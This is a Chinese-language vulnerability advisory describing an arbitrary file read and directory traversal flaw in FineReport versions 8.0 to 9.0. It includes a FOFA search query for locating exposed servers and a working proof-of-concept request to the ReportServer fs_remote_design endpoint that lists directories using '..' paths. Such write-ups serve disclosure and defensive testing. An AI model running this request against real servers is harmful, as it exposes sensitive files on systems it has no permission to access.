帆软报表_v8.0_-_9.0_存在任意文件读取漏洞-棉花糖会员站

# 帆软报表 v8.0 – 9.0 存在任意文件读取漏洞

## 漏洞描述

FineReport v8.0 – 9.0 任意文件读取漏洞，攻击者可以通过此漏洞获取敏感信息，为下一步攻击做准备。

## 漏洞影响

> FineReport v8.0
>
> FineReport v9.0

## FOFA

> body=”isSupportForgetPwd”

## POC

登录界面如下：

![1](/static/qingy/帆软报表_v8.0_-_9.0_存在任意文件读取漏洞/img/1.jpg)

查看当前目录路径

“`
http:///WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true
“`

![2](/static/qingy/帆软报表_v8.0_-_9.0_存在任意文件读取漏洞/img/2.jpg)

进一步读取此目录下的其他文件

![3](/static/qingy/帆软报表_v8.0_-_9.0_存在任意文件读取漏洞/img/3.jpg)

可以通过../对目录进行遍历，从而获取自己想要的信息

![4](/static/qingy/帆软报表_v8.0_-_9.0_存在任意文件读取漏洞/img/4.jpg)

文章版权归作者所有，未经允许请勿转载。

THE END

帆软报表_v8.0_-_9.0_存在任意文件读取漏洞